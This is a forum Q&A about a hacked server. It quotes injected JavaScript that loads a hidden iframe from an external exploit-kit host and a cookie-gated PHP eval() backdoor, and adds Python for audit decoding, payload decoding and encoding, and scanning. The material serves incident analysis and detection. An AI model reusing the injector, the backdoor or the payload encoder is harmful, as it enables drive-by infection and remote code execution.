-------- EDIT ---------

I do not agree that this is a duplicate of the linked question. I know that the correct way to deal with this is to wipe and reinstall the server. However, I am interested in the inner workings of this specific exploit and would still be happy if someone could help me out with some tips.


I'm trying to find out how a trojan made it onto my server and what exactly it is trying to achieve, with no success so far. I tried several malware scanners and antivirus solutions to get some details on this thing, and none of them was able to detect anything. However, many JS files on my server got modified and injected with the following snippet:

/*
Copyright (C) 2007 Free Software Foundation, Inc. http://fsf.org/
*/
function getCookie(name) {
/*
Each time you redistribute the Program (or any work based on the
Program), the recipient automatically receives a license from the original
licensor to copy, distribute or modify the Program subject to these
terms and conditions.  You may not impose any further restrictions on the
recipients' exercise of the rights granted herein.
*/
var resizegood = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return resizegood ? decodeURIComponent(resizegood[1]) : undefined;
}
function Lightebrothermind() {
var Litresbool = navigator.userAgent;
var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbool.indexOf("Windows") < +1);
var assa_a = (getCookie("ultras17broser") === undefined);
/*The Free Software Foundation may publish revised and/or new versions
of the General Public License from time to time.  Such new versions will
be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.*/
if (!Smiledbob && assa_a) {
document.write('<iframe src="http://bablastules.vila.com.ar/htrsjdrjfgerhrdtjytd16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "Times New Roman", Georgia, Serif;left: -901px;height: 100px;width: 100px;"></iframe>');
var date = new Date( new Date().getTime() + 65*60*60*1000 );
document.cookie="ultras17broser=1; path=/; expires="+date.toUTCString();
/*
Each version is given a distinguishing version number.  If the Program
specifies a version number of the license which applies to it and "any
later version", you have the option of following the terms and conditions
either of that version or of any later version published by the Free
Software Foundation.  If the Program does not specify a version number of
the license, you may choose any version ever published by the Free Software
Foundation.
*/
}
}
Lightebrothermind();
/*
Copyright (C) 2000 Free Software Foundation, Inc. See LICENSE.txt

I put an audit on one of the modified JS files, and this is the result:

    type=PATH msg=audit(1410282146.532:1496): item=0 name="/PATH/TO/myfile.js" inode=1628304 dev=fd:00 mode=0100664 ouid=10007 ogid=2001 rdev=00:00
    type=CWD msg=audit(1410282146.532:1496):  cwd="/PATH/TO/"
    type=SYSCALL msg=audit(1410282146.532:1496): arch=c000003e syscall=2 success=yes exit=60 a0=7fcf4646ca88 a1=241 a2=1b6 a3=692f736a2f756162 items=1 ppid=26429 pid=26769 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/lib/apache2/mpm-prefork/apache2" key=(null)

When I switch to the folder that, according to the audit, contains the modifying file, I find a PHP file with what seems like a randomly generated filename and the following content:

    <?php
    // Gate: only act when the __mestore cookie starts with the 16-character key
    if(!empty($_COOKIE['__mestore']) and substr($_COOKIE['__mestore'],0,16)=='3469825000034634'){
        // Payload: POST "message" holds urlencoded base64 of DEFLATE-compressed PHP; spaces are stripped first
        if (!empty($_POST['message']) and $message=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['message']))))){
            echo '<textarea id=areatext>';
            eval($message);   // run the attacker-supplied PHP, output wrapped in the textarea
            echo '</textarea>bg';
            exit;
        }
    }
    exit;

which looks like a backdoor to me. The weird thing, though, is that the file is not executable (664), and when I modify it to write the injected code to a text file, nothing happens.

So where do I start to solve this? I'd really appreciate any input, as I'm really starting to pull my hair out.

Oh, when I search the files for the code, I find a lot of similar files, spread all over the web folders on my server. When I turn Apache off, the modifying of files stops. I suspect that the trojan made it onto our server via a WordPress plugin, which supposedly had a vulnerability that exposed a loophole for attackers.

Thank you so much; I will happily provide any further info needed.

user871784
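What the audit records above actually say, as an added example that is not part of the original post: the three records are split into fields and the open(2) arguments decoded. On x86_64 (arch=c000003e) syscall 2 is open, a1=241 is hex for O_WRONLY|O_CREAT|O_TRUNC, and a2=1b6 is the create mode 0666, which under a umask of 002 yields the 664 shown in the PATH record; auid=4294967295 means no login session, and uid 33 is assumed here to be www-data as on Debian/Ubuntu (the exe path is the Debian layout, but the name-to-uid mapping is not on the page).

```python
"""Decode the auditd records quoted in the question (added example, not from the post)."""
import re

# The three records from the question, verbatim (the path was already shortened there).
AUDIT_RECORDS = """\
type=PATH msg=audit(1410282146.532:1496): item=0 name="/PATH/TO/myfile.js" inode=1628304 dev=fd:00 mode=0100664 ouid=10007 ogid=2001 rdev=00:00
type=CWD msg=audit(1410282146.532:1496):  cwd="/PATH/TO/"
type=SYSCALL msg=audit(1410282146.532:1496): arch=c000003e syscall=2 success=yes exit=60 a0=7fcf4646ca88 a1=241 a2=1b6 a3=692f736a2f756162 items=1 ppid=26429 pid=26769 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/lib/apache2/mpm-prefork/apache2" key=(null)
"""

AUDIT_ARCH_X86_64 = "c000003e"
# x86_64 syscall numbers relevant to "who modified this file" questions.
SYSCALL_NAMES = {1: "write", 2: "open", 82: "rename", 87: "unlink", 90: "chmod", 257: "openat"}
# open(2) flag bits from <asm-generic/fcntl.h>; audit prints a1 in hex.
ACCESS_MODES = {0: "O_RDONLY", 1: "O_WRONLY", 2: "O_RDWR"}
OPEN_FLAG_BITS = {0o100: "O_CREAT", 0o200: "O_EXCL", 0o1000: "O_TRUNC",
                  0o2000: "O_APPEND", 0o4000: "O_NONBLOCK", 0o2000000: "O_CLOEXEC"}
AUID_UNSET = 0xFFFFFFFF   # audit prints -1 (no login session) as 4294967295


def parse_record(line):
    """Turn one 'key=value key="quoted value" ...' audit record into a dict."""
    fields = {}
    for key, value in re.findall(r'(\w+)=("[^"]*"|\([^)]*\)|\S+)', line):
        fields[key] = value.strip('"')
    return fields


def parse_event(text):
    """Group the records of one audit event by record type (PATH, CWD, SYSCALL)."""
    records = (parse_record(line) for line in text.splitlines() if line.strip())
    return {rec["type"]: rec for rec in records}


def decode_open_flags(a1_hex):
    """Expand the hex flags argument of open(2)/openat(2) into flag names."""
    flags = int(a1_hex, 16)
    names = [ACCESS_MODES[flags & 0o3]]
    names += [name for bit, name in sorted(OPEN_FLAG_BITS.items()) if flags & bit]
    return names


def summarize(text=AUDIT_RECORDS):
    """Return the facts an investigator wants from the event as plain values."""
    event = parse_event(text)
    sc, path = event["SYSCALL"], event["PATH"]
    nr = int(sc["syscall"])
    is_open = nr in (2, 257)
    return {
        "x86_64": sc["arch"] == AUDIT_ARCH_X86_64,
        "syscall": SYSCALL_NAMES.get(nr, "syscall_%d" % nr),
        "success": sc["success"] == "yes",
        "fd": int(sc["exit"]),                     # on success, exit is the returned descriptor
        "path": path["name"],
        "flags": decode_open_flags(sc["a1"]) if is_open else [],
        "create_mode": oct(int(sc["a2"], 16)) if is_open else None,   # before umask
        "uid": int(sc["uid"]), "euid": int(sc["euid"]),
        "login_session": int(sc["auid"]) != AUID_UNSET,
        "pid": int(sc["pid"]), "ppid": int(sc["ppid"]),
        "comm": sc["comm"], "exe": sc["exe"],
    }


def explain(summary):
    """One-line reading of the summary. uid 33 = www-data is a Debian/Ubuntu convention (assumed)."""
    who = "%s (pid %d, parent %d) as uid %d" % (
        summary["comm"], summary["pid"], summary["ppid"], summary["uid"])
    if not summary["login_session"]:
        who += " with no login session (a daemon, not a logged-in user)"
    what = "%s %s with %s" % (summary["syscall"], summary["path"], "|".join(summary["flags"]))
    if "O_TRUNC" in summary["flags"]:
        what += ": the file was truncated and rewritten in place"
    return who + " called " + what


if __name__ == "__main__":
    print(explain(summarize()))
```

The SYSCALL record gives the writer's pid and ppid; the parent 26429 is the prefork master, and the child is whichever worker served the request, so the matching access-log line (same second as the audit timestamp 1410282146) is the next place to look.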
  • I already read that one, thanks. However, as this is obviously not a targeted, focused attack but a random one, and I know that there is no root access (or access at all other than through the Apache user, which is very limited), I would be really thankful for tips on removing this thing without having to wipe the whole server. – user871784 Sep 09 '14 at 19:57
  • Respectfully, you missed the point of the linked post. Responsible system administrators do not fix hacked servers. They wipe and replace. And specifically in your case, how do you know that a root exploit was not the cause? The only way to know that is to know what exploit was used, and if you knew that then you'd already have it fixed. – longneck Sep 09 '14 at 20:09
  • Besides the point @longneck has specified, simply forget any malware scanners, since they are designed to identify virus-like behavior, not cases like yours where a web-related exploit is much more likely. And wiping the machine alone is useless, since the exploit target will still remain after the machine is reinstalled. So before wiping, **identify the attack path** first. – Abel Cheung Sep 09 '14 at 20:22
  • Yeah, you are right. I assumed that there was no root exploit, as I could easily stop the activity of the scripts by shutting down Apache or modifying the rights of the files. Plus the discovery of the vulnerability in said plugin was exactly in the timeframe the thing occurred on my server. However, you are right, I don't know for sure and should wipe and replace. I really would love to find out what that trojan is doing anyway... – user871784 Sep 09 '14 at 20:22
  • I wrote [an answer on Security.SE](http://security.stackexchange.com/a/9259/1472) a while ago about this. Finding how they got in is not always possible, but if you can find the method it's nice to be able to fix that specific hole. You will still need to wipe and re-install and upgrade everything. – Ladadadada Sep 11 '14 at 10:45
  • Thanks for your comment. As I said before, I do understand I have to wipe the server. I would just like to know what happened (if that is possible, of course) in order to know where I have to apply some extra care on the new install. And yes, also because of personal interest. – user871784 Sep 11 '14 at 10:52
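How the backdoor's gate and decode chain work, as an added example that is not part of this thread: the Python below mirrors the PHP one-liner from the question (cookie prefix check, then urldecode, space stripping, non-strict base64 and raw-DEFLATE inflate) without the eval(), so that a request body recovered from access logs, mod_security or a capture can be turned back into the PHP the attacker sent. The sample payload, the cookie value and the encoder are constructed; no real request from the incident is on this page.

```python
"""Mirror of the backdoor's request handling, minus the eval() (added example, not from the post)."""
import base64
import re
import urllib.parse
import zlib

COOKIE_NAME = "__mestore"
COOKIE_PREFIX = "3469825000034634"     # the 16-character key the PHP compares against


def cookie_gate_open(cookies):
    """!empty($_COOKIE['__mestore']) and substr($_COOKIE['__mestore'], 0, 16) == '3469825000034634'."""
    value = cookies.get(COOKIE_NAME, "")
    return value not in ("", "0") and value[:16] == COOKIE_PREFIX   # PHP empty() treats "0" as empty


def decode_message(message):
    """gzinflate(base64_decode(str_replace(' ', '', urldecode($_POST['message'])))).

    `message` is the value as PHP leaves it in $_POST, i.e. already form-decoded once.
    """
    text = urllib.parse.unquote_plus(message)           # PHP urldecode(): %xx and '+' -> ' '
    text = text.replace(" ", "")                        # str_replace(' ', '', ...)
    text = re.sub(r"[^A-Za-z0-9+/=]", "", text)         # non-strict base64_decode drops other chars
    text += "=" * (-len(text) % 4)                      # ... and tolerates missing padding
    raw = base64.b64decode(text)
    return zlib.decompress(raw, -15).decode("latin-1")  # gzinflate = raw DEFLATE, no zlib header


def code_the_backdoor_would_eval(cookies, post):
    """Return the PHP that eval() would receive for this request, or None where the script just exit()s."""
    if not cookie_gate_open(cookies):
        return None
    message = post.get("message", "")
    if message in ("", "0"):                            # !empty($_POST['message'])
        return None
    try:
        code = decode_message(message)
    except (ValueError, zlib.error):                    # the @ operators hide these; gzinflate returns false
        return None
    return code if code not in ("", "0") else None      # 'and $message = ...' fails on a falsy string


def encode_message(php_code):
    """Inverse chain, as a client has to build $_POST['message'] (constructed; no real traffic was captured)."""
    compressor = zlib.compressobj(9, zlib.DEFLATED, -15)          # raw DEFLATE, like PHP gzdeflate()
    raw = compressor.compress(php_code.encode("latin-1")) + compressor.flush()
    b64 = base64.b64encode(raw).decode("ascii")
    # Percent-encode so the script's extra urldecode() does not turn a base64 '+' into a space;
    # the HTTP body itself then needs one more round of form-encoding on top of this value.
    return urllib.parse.quote(b64, safe="")


# Constructed sample: a harmless probe, and a cookie whose first 16 characters match.
SAMPLE_CODE = "echo php_uname(); echo getcwd();"
SAMPLE_COOKIES = {COOKIE_NAME: COOKIE_PREFIX + "rest-of-cookie-is-ignored"}
SAMPLE_POST = {"message": encode_message(SAMPLE_CODE)}

if __name__ == "__main__":
    print(code_the_backdoor_would_eval(SAMPLE_COOKIES, SAMPLE_POST))
```

Two things follow from the gate: a request without the cookie gets an empty 200 response from the script (it falls through to the final exit), so the file looks inert when fetched by hand or by a scanner, and the only server-side trace of a real visit is a POST to an odd .php path with a body that is one long form field. Filtering the access log for POSTs to files under upload or plugin directories in the seconds before each audit timestamp is the practical use of this.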

1 Answer

The code you are sharing is linked to the Nuclear Exploit Kit. There is code that will continue to inject iframes into all pages on your server. It is best to clear the site and restart from a backup. The backdoor you mentioned is also tied to attacks against CMS vulnerabilities. I am a malware researcher and would be willing to help clean up your system if you need it.

Adam
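An added example, not from the answer or the question: an indicator scan over a web root for the two artefacts seen in this thread, the cookie-gated off-screen iframe injector appended to .js files and the cookie-gated eval() backdoor in .php files. The sample tree it builds is constructed (paths and the random-looking file name are made up); the PHP content is the one-liner quoted in the question, and the JavaScript is a trimmed copy of the injected snippet with the landing host replaced by example.invalid.

```python
"""Indicator scan for the iframe injector and the eval() backdoor (added example, not from the thread)."""
import os
import re
import sys
import tempfile

JS_INDICATORS = {
    "iframe-write":  re.compile(r"document\.write\s*\(\s*['\"]<iframe", re.I),
    "offscreen":     re.compile(r"(?:top|left)\s*:\s*-\d{2,}px", re.I),   # iframe pushed off the viewport
    "marker-cookie": re.compile(r"document\.cookie\s*=\s*['\"]\w+=1\s*;", re.I),  # "already served" flag
}
PHP_INDICATORS = {
    "cookie-gate":  re.compile(r"\$_COOKIE\s*\[", re.I),
    "packed-input": re.compile(r"gzinflate\s*\(\s*@?\s*base64_decode", re.I),
    "eval":         re.compile(r"\beval\s*\(", re.I),
}


def classify(path, text):
    """Return (kind, matched indicators) when the file matches a pattern, else None."""
    ext = os.path.splitext(path)[1].lower()
    if ext == ".js":
        hits = [name for name, rx in JS_INDICATORS.items() if rx.search(text)]
        # a script-written iframe is common on its own; require the hiding or the marker cookie as well
        if "iframe-write" in hits and len(hits) >= 2:
            return "js-iframe-injector", hits
    elif ext in (".php", ".php5", ".phtml", ".inc"):
        hits = [name for name, rx in PHP_INDICATORS.items() if rx.search(text)]
        if "eval" in hits and "packed-input" in hits:
            return "php-eval-backdoor", hits
    return None


def scan(root):
    """Walk `root` and return sorted (relative path, kind, indicators) for every match."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                with open(full, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue
            result = classify(full, text)
            if result:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                findings.append((rel, result[0], result[1]))
    return sorted(findings)


# --- constructed sample tree ---------------------------------------------------
INJECTED_JS = r"""function getCookie(n){var m=document.cookie.match(new RegExp("(?:^|; )"+n+"=([^;]*)"));return m?m[1]:undefined;}
if(getCookie("ultras17broser")===undefined){document.write('<iframe src="http://example.invalid/landing.html" width="200" height="200" style="top: -901px;position: absolute;left: -901px;"></iframe>');document.cookie="ultras17broser=1; path=/";}
"""
CLEAN_JS = """document.cookie = "theme=dark; path=/";
document.write('<div id="banner">welcome</div>');
"""
BACKDOOR_PHP = r"""<?php
if(!empty($_COOKIE['__mestore']) and substr($_COOKIE['__mestore'],0,16)=='3469825000034634'){if (!empty($_POST['message']) and $message=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['message']))))){echo '<textarea id=areatext>';eval($message);echo '</textarea>bg';exit;}} exit;
"""
CLEAN_PHP = """<?php
define('WP_USE_THEMES', true);
require __DIR__ . '/wp-blog-header.php';
"""
SAMPLE_TREE = {
    "js/app.js": CLEAN_JS,
    "js/app.min.js": "function add(a,b){return a+b;}\n" + INJECTED_JS,  # injector appended to a real file
    "index.php": CLEAN_PHP,
    "wp-content/uploads/x9f2k.php": BACKDOOR_PHP,                     # made-up random-looking name
}


def build_sample_tree(root):
    for rel, content in SAMPLE_TREE.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)


def demo():
    """Build the sample tree in a temp dir, scan it and return the findings."""
    root = tempfile.mkdtemp(prefix="scan-demo-")
    build_sample_tree(root)
    return scan(root)


if __name__ == "__main__":
    for rel, kind, hits in (scan(sys.argv[1]) if len(sys.argv) > 1 else demo()):
        print("%-40s %-20s %s" % (rel, kind, ",".join(hits)))
```

Run it against a copy of the web root taken from the compromised host (`python scan.py /path/to/copy`) rather than on the live system, and treat the output as triage for the attack-path question raised in the comments, not as proof of a clean tree: the patterns match the variants shown in this thread, and an obfuscated rewrite of either would pass.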